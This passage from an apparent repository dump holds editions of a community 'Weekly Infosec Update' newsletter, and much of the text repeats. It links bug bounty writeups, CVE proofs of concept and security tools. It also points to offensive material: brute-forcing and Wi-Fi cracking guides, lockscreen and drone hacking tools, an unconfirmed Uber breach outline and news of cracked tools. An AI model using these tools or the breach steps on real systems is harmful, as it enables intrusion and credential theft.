Pentesting](https://akash-venky091.medium.com/network-segmentation-pentesting-97238d63b001) and how it can be used to validate the isolation of less-secure networks.\n \n   - @302Found released [PART 2 of Cool Recon techniques every hacker misses!🔥](https://infosecwriteups.com/cool-recon-techniques-every-hacker-misses-episode-2-8024e8338756), and in case you have not read it, here is [PART 1](https://infosecwriteups.com/cool-recon-techniques-every-hacker-misses-1c5e0e294e89)\n  \n   - @zer0d shared a writeup explaining [How he found 3 vulnerabilities in a day](https://infosecwriteups.com/how-i-found-3-bug-bounties-in-a-day-c82fe023716e); the 3 vulnerabilities were a bypass of one-time usage on the sign-in link, a credit card checker bypass, 
and e-mail bombing / rate limiting.\n \n   - @OmarHashem shared a story on how he [abused the file upload function to get a high severity vulnerability in Bug Bounty](https://infosecwriteups.com/how-i-abused-the-file-upload-function-to-get-a-high-severity-vulnerability-in-bug-bounty-7cdcf349080b)\n \n   - Bug hunter @viruszzwarning observed that many websites have a specific type of vulnerability, directory listing, and that this is [leaking their clients' identification details, like Aadhaar card, PAN card, bank details and many more…](https://viruszzwarning.medium.com/aadhaar-pan-info-leak-4189b6057cd4)\n \n   - A few months back I shared a video on Bun (a new open-source runtime environment created by Jarred Sumner and over 40 contributors), where developers are predicting that [Bun - an incredibly fast all-in-one JavaScript runtime - is going to replace NodeJS](https://medium.com/@appiahyoofi/goodbye-node-js-9e2f71f5e430). As bug hunters you should keep an eye on this.\n \n  </details>  \n\nLast week, @intigriti asked the community for pickup lines for bug hunters, and one of my favourites was\n- You're like a P1: special and hard to find.\n\n</details> \n\n\n<details> \n<summary><b> 🛠️🛠️🛠️ TOOLS 🛠️🛠️🛠️ </b></summary>  \n\nCommunity members test the tools, and every week we filter out the most in-demand and helpful tools that serve the hacker's purpose in different domains.\n\n<details>\n<summary><b>1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting - 5 Tools</b></summary>\n  \n - **1. 
SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting** - 5\n    \n    - [CATS](https://github.com/Endava/cats) -> REST API Fuzzer And Negative Testing Tool For OpenAPI Endpoints, by Endava, and a detailed tutorial on [how to use CATS](https://www.kitploit.com/2022/09/cats-rest-api-fuzzer-and-negative.html) by KitPloit.\n    - [UseReFuzz](https://github.com/root-tanishq/userefuzz) -> SQLi Tester for HTTP Headers, by [Kun](https://twitter.com/root_tanishq)\n    - [Mizusawa](https://github.com/0x727/ShuiZe_0x727) -> Information Gathering Automation Tool.\n    - [Darc - Darkweb Crawler Project](https://github.com/JarryShaw/darc) -> darc is designed as a Swiss army knife for darkweb crawling. It integrates requests to collect HTTP request and response information, such as cookies, header fields, etc. It also bundles selenium to provide a fully rendered web page and a screenshot of that view.\n    - [requests-ip-rotator](https://github.com/Ge0rg3/requests-ip-rotator) -> A Python library to utilize AWS API Gateway's large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.\n</details> \n\n<details>\n<summary><b>2. Cloud Security - 3 Tools </b></summary>\n \n - **2. Cloud Security** - 3\n     - [CloudFox](https://github.com/BishopFox/cloudfox) -> Automating situational awareness for cloud penetration tests.\n     - [cloudvelo](https://github.com/Velocidex/cloudvelo) -> An experimental Velociraptor implementation using cloud infrastructure.\n     - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting assets from cloud providers. It is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration effort.\n </details> \n\n<details>\n<summary><b>3. Blue/Red/Purple Team, IR and Threat intelligence - 5 Tools </b></summary>\n \n - **3. 
Blue/Red/Purple Team, IR and Threat intelligence Tools** - 5\n     - [Varc - Volatile Artifact Collector](https://github.com/cado-security/varc) -> varc collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.\n     - [Codecepticon](https://github.com/Accenture/Codecepticon) -> An offensive security obfuscator for C#, VBA, and PowerShell.\n     - [LDAP Nom Nom](https://github.com/lkarlslund/ldapnomnom) -> Anonymously bruteforces Domain Controllers to find usernames in Active Directory at high speed.\n     - [exploits-predict](https://github.com/wisoffe/exploits-predict) -> Predicts the probability of an exploit being released after a CVE is published (using a machine learning algorithm); the project is based on the [Cookiecutter data science project template](https://drivendata.github.io/cookiecutter-data-science/).\n     - [Elixir Secure Coding Training (ESCT)](https://github.com/Podium/elixir-secure-coding) -> An interactive cybersecurity curriculum designed for enterprise use.\n</details> \n\n<details>\n<summary><b>4. Reverse Engineering & OSINT - 3 Tools </b></summary> \n \n - **4. Reverse Engineering & OSINT Tools** - 3\n     - [PE-bear](https://github.com/hasherezade/pe-bear) -> A multiplatform reversing tool for PE files. Its objective is to deliver a fast and flexible “first view” for malware analysts, stable and capable of handling malformed PE files.\n     - [uosint](https://github.com/uosint-project/uosint) -> Find the profiles of a person on social networks.\n     - [TRIFECTA](https://github.com/V1XX-1/TRIFECTA-Search-Tool) -> A batch script that allows you to search a phrase or keywords with 12 different search engines. You can do so one at a time or all at once.\n\n </details> \n\n<details>\n<summary><b>5. 
IoT, OS & Hardware - 3</b></summary>   \n \n  - **5. IoT, OS & Hardware** - 3\n      \n      - [CiLocks](https://github.com/tegal1337/CiLocks) -> Crack interface lockscreen, Metasploit and more Android/iOS hacking.\n      - [Cotopaxi](https://github.com/Samsung/cotopaxi) -> Set of tools for security testing of Internet of Things devices using specific network IoT protocols.\n      - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) -> Drone Hacking Tool is a GUI tool that works with a USB WiFi adapter and HackRF One for hacking drones.\n\n </details> \n</details> \n \n ---\n##### Wrapping Up\n\n  Have questions, suggestions, or feedback? Just reply directly to this mail, I'd love to hear from you.\n  \n  If you find this update useful and know other people who would too, I'd really appreciate it if you'd forward it to them.\n  Thanks for reading!\n\n"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/WIU_Templete/WIU_Trail_For_Professionals.md",
    "content": "#### Hey Hackers, I hope you’ve been doing well on the weekend! and quote of Week is \"Don't rush the Process. Good Things Take Time.\"\n Here are the Agenda for *Weekly infosec Update v0.5* : **21st-27th September 2022**\n \n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n<p align=\"\"> <img src=\"https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat\" alt=\"Pentesting-Bugbounty//ResetCybersecuirty/\" /> </p> \n\n**Tips to SAVE TIME & How to READ this Newsletter? 👇**\n- Select the topic from the *Navbar* bellow and click on **Preview** and **Arrow (>)** to see the Details:\n- Open all relevant Title in New Tab (Ctrl+Click) then READ it one by one.\n\n[![cve poc](https://img.shields.io/badge/-CVE-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![research & Business](https://img.shields.io/badge/-Research-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![beginners](https://img.shields.io/badge/-News-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-beginners) \n\n![WIU_Trail_Pro](https://user-images.githubusercontent.com/25515871/191970244-14b8821b-acd9-4fb6-8e9b-f627392c4715.png)\n\nHuge thanks to our awesome [Community Leader for contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team.\n\n<details>\n<summary><b></b></summary>\n  - Contributors : Good Resources Share, Paul miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n</details>\n \n---\n\n<span 
id=\"title-cve\"></span>\n### 🪲🪲🪲 CVE : poc exploit and cve analysis 🪲🪲🪲\n\n#### Week -> [21st September - 27th September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).\n\nThere are tens of thousands of vulnerabilities disclosed each Week. Only a handful of them will ever be exploited So In this Section, Every Week we filter out [Security that has been Patched within a Week, CVE: ANALYSIS & POC that have critical or Higher Severity](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md). Click on link to see all the mentioned Patches, poc, analysis and 0-day exploit.\n\n<details> \n<summary><b>Preview</b></summary>\n\n \n        Security Patched :   Latest IT security vulnerability patched within this week on selected company such as Apple, Google,                                      \n                             Microsoft, Github, Linux(Ubuntu, kali etc), wordpress etc. \n        \n        CVE:ANALYSIS & POC:  CVE-2022-32883 Analysis: Turning Your Computer Into a GPS Tracker With Apple Maps.                         \n                          \n         \n        CVE POC :            cve-2022-32548 RCE, cve-2022-2588, cve-2022-34721, cve-2022-36804, cve-2022-34709, cve-2022-33980, \n                             cve-2019-2215 & GwisinMsi poc based on recreating an MSI Payload for Fun and no profit blog.   \n \n\n</details> \n\n---  \n\n<span id=\"title-research\"></span>\n### 🔍🔍🔍 RESEARCH, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n  In this Segment, we collect amazing things from all over the infosec domain for Researcher and professionals those who want to explore Security, looking for the new approach to find vulnerability, want to track of Infosec market and startups. 
\n<details>\n<summary><b>1 - Infosec Business, funded and Market</b></summary> \n \n - **1 - Infosec Business, funded and Market** \n     \n    - [CISA Strategic plan report for year 2023 - 2025](https://drive.google.com/file/d/1-vQYIJ7sZrn_PAxpO3W0ytX2-Oc2eXoB/view?usp=sharing)\n    - [Why do security products fail?](https://my.rage.cloud/why-do-security-products-fail-7477dd0ec878) \n    \n    - InfoSec Market\n      - [Understand the Indian Market, client and understand who is right client for your business](https://drive.google.com/file/d/1yRuIGqb5gcWN_F_tgqHgZA7RuLr34sIS/view?usp=sharing) \n      - [Cybersecurity Funding Review for August 2022](https://www.returnonsecurity.com/cybersecurity-funding-review-august-2022/?utm_source=securityfundednewsletter) , by Mike p.\n      - [Global Automotive Cybersecurity Market to Reach $5.3 Billion by 2026](https://www.prnewswire.com/news-releases/global-automotive-cybersecurity-market-to-reach-5-3-billion-by-2026--301622955.html?utm_source=securityfundednewsletter)\n      \n  </details>\n  \n<details>\n<summary><b> 2 - Web Security and android security,  3 - Cloud Security,  4 - Blue/Red/Threat Intelligence Team</b></summary>\n   \n - **1 - Web Security and android security**\n     - [CompTIA Pentest + Certification review after 2nd attempt](https://notes.n3m3515.space/pentest/comptia-pentest-002-notes) by Inside \n     - [How to avoid data breaches with GraphQL?](https://blog.escape.tech/data-leaks/), by Sophie Boulaaouli\n     - A security expert's [guide on scanning unpatched wordpress blogs](https://blog.criminalip.io/2022/09/13/wordpress-vulnerability/)\n     - A report by WPSCAN.COM, where they have demonstared [HOW TO:FIND WORDPRESS PLUGIN VULNS](https://drive.google.com/file/d/1DlzXw2iNvLXzm-it5G6nwENnL0v7zcrk/view?usp=sharing)\n     - @hakluke & @pry0cc wrote a blog for projectdiscovery [Guide to DNS takeovers 😊](https://blog.projectdiscovery.io/guide-to-dns-takeovers/)\n     - Tamir describes in this article  
how he found CVE-2021-1961, [Attacking the Android kernel using the Qualcomm TrustZone](https://tamirzb.com/attacking-android-kernel-using-qualcomm-trustzone) where Android kernel exploit utilizes the TrustZone in order to compromise the kernel.        \n \n  - **2 - Cloud Security**\n     - [Azure Threat Research Matrix](https://microsoft.github.io/Azure-Threat-Research-Matrix/) -> The purpose of this is to conceptualize the known TTP that adversaries may use against Azure.\n     - [Incident response in AWS CloudTrail](https://www.chrisfarris.com/post/aws-ir/)\n     - [Threat Detection, Investigation, and Response in the Cloud](https://services.google.com/fh/files/misc/gcat_threat_detection_cloud_a.pdf)\n   \n- **3 - Blue/Red/Purple/Threat Intelligence Team**\n   - **Blue Team**\n     - Practical Guidance for [IT Admins to respond after Ransomware attacks](https://m365internals.com/2022/09/19/practical-guidance-for-it-admins-to-respond-to-ransomware-attacks/)\n     - [How to kick off an incident response investigation for a compromised SaaS account](https://pushsecurity.com/blog/how-to-kick-off-an-incident-response-investigation-for-a-compromised-saas/), by Johann Scheepers.\n     - [Data-Centric Security: Threat Hunting based on Zipf’s Law](https://ditrizna.medium.com/data-centric-security-threat-hunting-based-on-zipfs-law-50ad919fc135)\n     - [Cross-Layer Security: A Holistic View of Internet Security](https://freedom-to-tinker.com/2022/09/20/cross-layer-security-a-holistic-view-of-internet-security/), by Henry Birge-Lee, Liang Wang, Grace Cimaszewski, Jennifer Rexford and Prateek Mittal.\n     - [The Evolution of the Chromeloader Malware](https://blogs.vmware.com/security/2022/09/the-evolution-of-the-chromeloader-malware.html)\n     - [Recreating an MSI Payload for Fun and no profit](https://blog.sunggwanchoi.com/recreating-a-msi-payload-for-fun-and-no-profit/)\n     - [Efficient Proofs of Software Exploitability for Real-world 
Processors](https://eprint.iacr.org/2022/1223)\n   \n  - **Red Team**\n     - [Windows Kernel Exploitation instruction](https://hackmd.io/@truebad0ur/WindowsKernelExploiting) and [Assembled HEVD driver and loader](https://drive.google.com/file/d/19NmwL88KmiOAcRlodNCB-m9oNxC31But/view?usp=sharing)\n     - How to [crack the WEP key using only one data packet and a wordlist, and then use the wireshark tool to decode the data packet](https://tbhaxor.com/decrypt-wep-traffic-with-insufficient-ivs/)\n     - How to [crack the key of a WEP-encrypted WiFi network](https://tbhaxor.com/pivot-through-protected-wifi-network/) and pivot into it to interact with vulnerable services running on it.\n     - How to [capture the 2 out of 4 EAPOL handshakes of WPA network](https://tbhaxor.com/cracking-wpa-psk-using-aircrack/) and crack the password from a wordlist. \n     - How to [set up a honey pot access point with hostapd and capture the EAPOL handshake from a probing client to brute force the pre-shared key.](https://tbhaxor.com/crack-wpa-psk-from-probing-clients-without-access-point/)\n     - [Shellcode Injection in C# - Part 3](https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques-Part-3/) - using API call QueueUserAPC, By Ahmed Sher.\n \n</details>\n\n---\n<span id=\"title-beginners\"></span>\n## Beginners-Friendly \n\n<details> \n<summary><b>\n📰📰📰 Community Infused NEWS 📰📰📰  </b></summary>   \n\n <details> \n <summary><b> 1. 
Twiter Threads & Tips\n </b></summary>   \n \n - 🟢 [LockBit ransomware group pays its first ever $50k bug bounty](https://twitter.com/ido_cohen2/status/1571039567666638848)\n - 🟢 On 12th Sept 2022 [idclickthat](https://twitter.com/idclickthat) tweeted about [Malware @Zoom downloads](https://twitter.com/idclickthat/status/1569350142230204421?t=_7lpBg7U-iokSMCGtSXZSw&s=19) On 19th Sept, Cyble Research and Intelligence Labs (CRIL) released a blog about @idclickthat tweet investigation and It turn out [New Malware Campaign Targets Zoom Users](https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/)\n - 🟢 @SamCurry received [2 crore from Google because of human error.😅](https://twitter.com/samwcyo/status/1569897392560050178?t=TROhjl9xQpcHnG3UOv_uow&s=19)\n - 🟢 [William Wallace](https://twitter.com/phyr3wall/) released his 1st youtube video on DNS Zone Takeovers](https://www.youtube.com/watch?v=DLNjP9KSgzA&feature=youtu.be)\n</details>  \n \n<details> \n<summary><b>\n2. Data Breach & BlackHat Hackers Leaked\n</b></summary> \n   \n - 🔴 **News - Paid Tools** that has been leaked or cracked by Black Hat Hackers : Cobaltstrike 4.7.1 Licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, acunetix_14.9.220913107, BurpSuite_pro_v2022_9.1,Acunetix Version 14 build 14.9.220713150 for Windows, Nessus Core + tenableSC 20220307 ISO  & Linux, Malcat malware analyzer, xray_1.9.1_windows_x64, bruteratel 1.2.2, and 010 Editor 13.0-beta2.\n \n - 🔴 **News - Black Hat Hacker leaked** : GTA 6 has been leaked over onion browser, Conti source code for v3.7.7 and Taurus bot source code has been leaked. \n   \n - 🔴 \"UBER GOT HACKED\". 
After few days Uber officially recorgnized the Data Breach and mentioned that Laplus$ group was behind the attack but Hacker group VX underground and indivisuals such as ColtonSeal, Kevin shared multiple SS where hacker claimed and mocked the security of Uber and shared the Unconfirmed method of breach:\n   - Socially engineer an employee to get on their VPN (could have been prevented with webauthn / hardware 2fa)\n   - Once on VPN, scan their intranet and find a network share     \n   - Network share has powershell scripts contained the username and password for a admin user in Thycotic (PAM) Using this hacker was able to extract secrets for all services, DA, DUO, Onelogin, AWS, GSuite\", domain admin, AWS instance, HackerOne administration panel, and more.\n   - From there can get full access to all systems.\n   - When the individual breached Uber, they sent a slack notification to everyone informing them the company had been breached.Employees thought it was a joke.\n</details> \n \n<details> \n<summary><b>\n3. Top Infosec News\n</b></summary> \n\n - 🟢 **Announcement** : \n   - [Active Directory integration features in Ubuntu 22.04](https://ubuntu.com/engage/New-Active-Directory-integration-features)              \n   - Apple has released another round of security updates to address multiple vulnerabilities in iOS and macOS, including a new zero day vulnerabilty.\n   - Microsoft on Tuesday shipped fixes to quash 64 new security flaws across its software lineup, including one zero-day flaw that has been actively exploited in real-world attacks. \n - 🟢 TikTok still denies security breach of 2 billions users information after hackers leak user data, source code. 
\n - 🟢 Rockstar Games Confirms Hacker Stole Early Grand Theft 6 and Uber also confirm that their data has been leaked by Laplus$ group.\n - 🟢 [Europol and Bitdefender Release Free Decryptor for LockerGoga Ransomware](https://www.nomoreransom.org/uploads/LockerGoga-Decrypt-Doc.pdf)\n - 🟢 [Microsoft Teams stores auth tokens as cleartext in Windows, Linux, Macs](https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/), by bleepingcomputer.\n</details> \n \n<details> \n<summary><b>\n4. Event Recap\n</b></summary>\n \nThis Week THREATCON 2022 Conferences and Null Delhi meetup registration was mainly trending on twitter and We have collected public available important Talk, Slides, Tools, Podcast, Videos, upcomming events related to conferences, talks & webinars so you don't miss it and watch them, at a time that suits you.\n\n - **Conferences**\n   - At THREAT CON SEP 2022, Akshay & bharath shared their talk [FRida Unleashed - Scratching beneath the surface of bug bounties](https://speakerdeck.com/0xbharath/frida-unleashed-scratching-beneath-the-surface-of-bug-bounties)\n\n - **Webinars and videos**\n   - Null Delhi September Meetup is scheduled for 24 Sep 2022 at @esecforte office in Gurugram. you can [Register here](https://null.community/events/844-delhi-monthly-meetup)\n   - For Red Team, This is really a awsome video but you have you watch it with subtitle where @lsecqt demonstrated a [walkthrough for Sliver C2 is brand new (and still in development) Command and Control Framework](https://www.youtube.com/watch?v=QO_1UMaiWHk). 
It has only CLI version (for now) and is designed to be extremely easy to install and to work with.\n\n  - **Ongoing/Upcomming 𝙀𝙑𝙀𝙉𝙏𝙎**:   \n \n   - MSSP Alert Live : 19th-21st September | Washington DC\n   - CSO50 : 19th-21st September | Washington DC \n   - Fal.Con 2022 : 19th-21st September | Las Vegas \n   - Texas Cyber Summit 2022 : 22nd-24th September | Austin\n   - BSides Singapore Conference 2022 : 22nd-23rd September\n   - InfoSec World 2022 : 26th-28th September | Orlando \n  \n   - 9th Annual Control Systems Cybersecurity : 29th September | UK\n   - BruCON : 29th to 30th September | Mechelen, BE \n   - NetDiligence Cyber Risk Summit : 10th-12th October | Santa Monica\n   - Cyber Security World : 12th to 13th October | Singapore, SG \n   - CISO visions : 17th to 21st October | Virtual – English \n   - Mandiant mWISE Cybersecurity Conference 2022 : 18th-20th October |  Washington DC \n   - E-crime & Cybersecurity London : 19th October | London, UK \n   - 7th Annual Counter Insider Threat Symposium : 19th October | Maryland \n   - IT-SA : 25th to 27th October | Nuremberg, DE \n\n</details> \n   \n<details> \n<summary><b>\n5. Hiring/Jobs\n</b></summary>\n \nIn this Beginners friendly segment, we talk about and share latest resources related to Jobs in this month, interview questions and free trainning offered by organization, community and leader.\n \n - 1. Take a Look at [Internship/Job Opening in September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n - 2. Here ResetHacker have collected [Interview Questions asked by organization](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n</details> \n</details> \n\n\n<details> \n<summary><b> 🐞🐞🐞 BUG BOUNTY : report, vulnerability Writeups and resources 🐞🐞🐞  </b></summary>   \n\n <details> \n <summary><b>1. Hackerone/Bugcrowd reports for Bug Hunters. 
</b></summary>\n \n *1. In This Segment, We have filtered out Top **HACKERONE/BUGCROWD REPORT** for Bug Hunters :*\n   - 🐞$4,000 - [SSRF in Functional Administrative Support Tool pdf generator (████)](https://hackerone.com/reports/1628209) in U.S. Dept Of Defense.\n   - 🐞$2,400 - [Airflow Daemon Mode Insecure Umask Privilege Escalation](https://hackerone.com/reports/1690093) in Apache Airflow prior to 2.3.4.\n   - 🐞$2,000 - [Remote Code Execution on https://███ via improper access control to SCORM Zip upload/import](https://hackerone.com/reports/1122791) in U.S. Dept Of Defense.\n   - 🐞[STORED XSS in █████████/nlc/login.aspx via \"edit\" GET parameter through markdown editor](https://hackerone.com/reports/1631447) in U.S. Dept Of Defense.\n</details> \n \n<details> \n<summary><b>2.  Bug bounty writeups, tips & resources. </b></summary>\n \n *2. In This Beginners friendly segment, We collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES***   \n   - @Mohsinkhan answered a question for new bug hunters through article [What would I do if I start bug hunting from 0 again?](https://mokhansec.medium.com/what-would-i-do-if-i-start-bug-hunting-from-0-again-79c7fa78b789)\n   - In this article, @AkashVenky talked about [Network Segmentation Pentesting](https://akash-venky091.medium.com/network-segmentation-pentesting-97238d63b001) and How it could be used to validate that less-secure networks.\n \n   - @302Found, releases the [PART 2 of Cool Recon techniques every hacker misses!🔥](https://infosecwriteups.com/cool-recon-techniques-every-hacker-misses-episode-2-8024e8338756) and incase you have not read the [PART 1](https://infosecwriteups.com/cool-recon-techniques-every-hacker-misses-1c5e0e294e89)\n  \n   - @zer0d shared a writeup explaining [How he found 3 vulnerability in a day?](https://infosecwriteups.com/how-i-found-3-bug-bounties-in-a-day-c82fe023716e) and the 3 vulnerabilites was Bypassed one-time usage on the sign-in link, The credit card checker bypass, 
E-mail bombing and Rate limit.\n \n   - @OmarHashem shared a story on how he [abused the file upload function to get a high severity vulnerability in Bug Bounty](https://infosecwriteups.com/how-i-abused-the-file-upload-function-to-get-a-high-severity-vulnerability-in-bug-bounty-7cdcf349080b)\n \n   - Bug hunter @viruszzwarning observed that many websites have a specific type of vulnerability, i.e. directory listing, and this is [leaking their clients' identification details, like Aadhaar card, PAN card, Bank details and many more…](https://viruszzwarning.medium.com/aadhaar-pan-info-leak-4189b6057cd4)\n \n   - A few months back I shared a video on Bun (a new open source runtime environment created by Jarred Sumner and over 40 contributors) where developers are predicting that [Bun - an incredibly fast all-in-one JavaScript runtime - is going to replace NodeJs](https://medium.com/@appiahyoofi/goodbye-node-js-9e2f71f5e430). As bug hunters you should keep an eye on this.\n \n  </details>  \n\nLast week, @intigri asked the community for pickup lines for bug hunters, and one of my favourites was\n- You're like a P1: special and hard to find.\n\n</details> \n\n\n<details> \n<summary><b> 🛠️🛠️🛠️ TOOLS 🛠️🛠️🛠️ </b></summary>  \n\nCommunity members test the tools, and every week we filter out the most in-demand and helpful tools that serve the hacker's purpose in different domains.\n\n<details>\n<summary><b>1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting - 5 Tools</b></summary>\n  \n - **1. 
SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting** - 5\n    \n    - [CATS](https://github.com/Endava/cats) -> REST API fuzzer and negative testing tool for OpenAPI endpoints, by Endava, and a detailed tutorial on [how to use CATS](https://www.kitploit.com/2022/09/cats-rest-api-fuzzer-and-negative.html) by KitPloit.\n    - [UseReFuzz](https://github.com/root-tanishq/userefuzz) -> SQLi tester for HTTP headers, by [Kun](https://twitter.com/root_tanishq)\n    - [Mizusawa](https://github.com/0x727/ShuiZe_0x727) -> Information gathering automation tool.\n    - [Darc - Darkweb Crawler Project.](https://github.com/JarryShaw/darc) -> darc is designed as a swiss army knife for darkweb crawling. It integrates requests to collect HTTP request and response information, such as cookies, header fields, etc. It also bundles selenium to provide a fully rendered web page and a screenshot of that view.\n    - [requests-ip-rotator](https://github.com/Ge0rg3/requests-ip-rotator) -> A Python library to utilize AWS API Gateway's large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing. \n</details> \n\n<details>\n<summary><b>2. Cloud Security - 3 Tools </b></summary>\n \n - **2. Cloud Security** - 3\n     - [CloudFox](https://github.com/BishopFox/cloudfox) -> Automating situational awareness for cloud penetration tests. \n     - [cloudvelo](https://github.com/Velocidex/cloudvelo) -> An experimental Velociraptor implementation using cloud infrastructure.\n     - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting assets from cloud providers. This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration effort.\n </details> \n\n<details>\n<summary><b>3. Blue/Red/Purple Team, IR and Threat intelligence - 5 Tools </b></summary>\n \n - **3. 
Blue/Red/Purple Team, IR and Threat intelligence Tools** - 5\n     - [Varc - Volatile Artifact Collector](https://github.com/cado-security/varc) -> varc collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.\n     - [Codecepticon](https://github.com/Accenture/Codecepticon) -> An offensive security obfuscator for C#, VBA, and PowerShell.\n     - [LDAP Nom Nom - anonymously bruteforce Active Directory usernames at high speed](https://github.com/lkarlslund/ldapnomnom),which allows you to anonymously bruteforce Domain Controllers to find usernames in Active Directory at high speeds.\n     - [exploits-predict](https://github.com/wisoffe/exploits-predict) -> Predicting the probability of an exploit being released after a CVE is published (by Machine learning algorithm) and this project is based on [Cookiecutter data science project template.](https://drivendata.github.io/cookiecutter-data-science/)\n     - [Elixir Secure Coding Training (ESCT)](https://github.com/Podium/elixir-secure-coding) - An interactive cybersecurity curriculum designed for enterprise use.\n</details> \n\n<details>\n<summary><b>4. Reverse Engineering & OSINT - 3 Tools </b></summary> \n \n - **4. Reverse Engineering & OSINT Tools** - 3\n     - [PE-bear](https://github.com/hasherezade/pe-bear) is a multiplatform reversing tool for PE files. Its objective is to deliver fast and flexible “first view” for malware analysts, stable and capable to handle malformed PE files.\n     - [uosint](https://github.com/uosint-project/uosint) -> Find The Profiles Of A Person On Social Networks.  \n     - [TRIFECTA](https://github.com/V1XX-1/TRIFECTA-Search-Tool) -> A batch script that allows you to search a phrase or keywords with 12 different search engines. You can do so one at a time or all at once.                  \n\n </details> \n\n<details>\n<summary><b>5. 
IoT, OS & Hardware - 3</b></summary>   \n \n  - **5. IoT, OS & Hardware** - 3\n      \n      - [CiLocks](https://github.com/tegal1337/CiLocks) -> Crack interface lockscreen, Metasploit and more Android/iOS hacking.\n      - [Cotopaxi](https://github.com/Samsung/cotopaxi) -> Set of tools for security testing of Internet of Things devices using specific network IoT protocols.\n      - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) -> Drone Hacking Tool is a GUI tool that works with a USB Wifi adapter and HackRF One for hacking drones.\n\n </details> \n</details> \n \n ---\n##### Wrapping Up\n\n  Have questions, suggestions, or feedback? Just reply directly to this mail; I'd love to hear from you.\n  \n  If you find this update useful and know other people who would too, I'd really appreciate it if you'd forward it to them 🙏\n  Thanks for reading!\n\n\n\n"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/WIU_Templete/WIU_v0.3.md",
    "content": " #### Hey Hackers, I hope you’ve been doing well! \n Here are the Agenda for \"Weekly infosec Update\" 04 (23rd - 30th Aug 2022) \n \n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n<p align=\"\"> <img src=\"https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat\" alt=\"Pentesting-Bugbounty//ResetCybersecuirty/\" /> </p>\n\n<img src=\"https://user-images.githubusercontent.com/25515871/187194321-176cb509-f25c-4e5a-9077-0151b5e88274.png\" width=\"650\" height=\"825\">   \n\n---\n\n#### We started working on \"Weekly Infosec Update\" because It's very time consuming to monitor the InfoSec Community on twitter, telegram, reddit. discord and visiting security website every day. \nWe had no idea we’d end up releasing \"Weekly Infosec Update\" every Wednesday. Huge thanks to our awesome [Community Leader to contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team.\n\nContributors : - Good Resources Share, Paul miller, [Tarang Parmar](https://github.com/TarangParmar), [Tuhin Bose](https://github.com/tuhin1729), Vikram and Alexandre ZANNI ([@noraj](https://github.com/noraj) Github Moderator).\n\n---\n\n### Let's start the Week recap, and my apology for So much Info. We're finding a way to make it shorter.\n\n### 🏛️🏛️🏛️ HIRING, WORKSHOP & TRAINNING 🏛️🏛️🏛️\n\n**Here we talk about and share resources related to Jobs, Ongoing Workshop and free trainning offered by organization, community and leader.**\n\n1. 
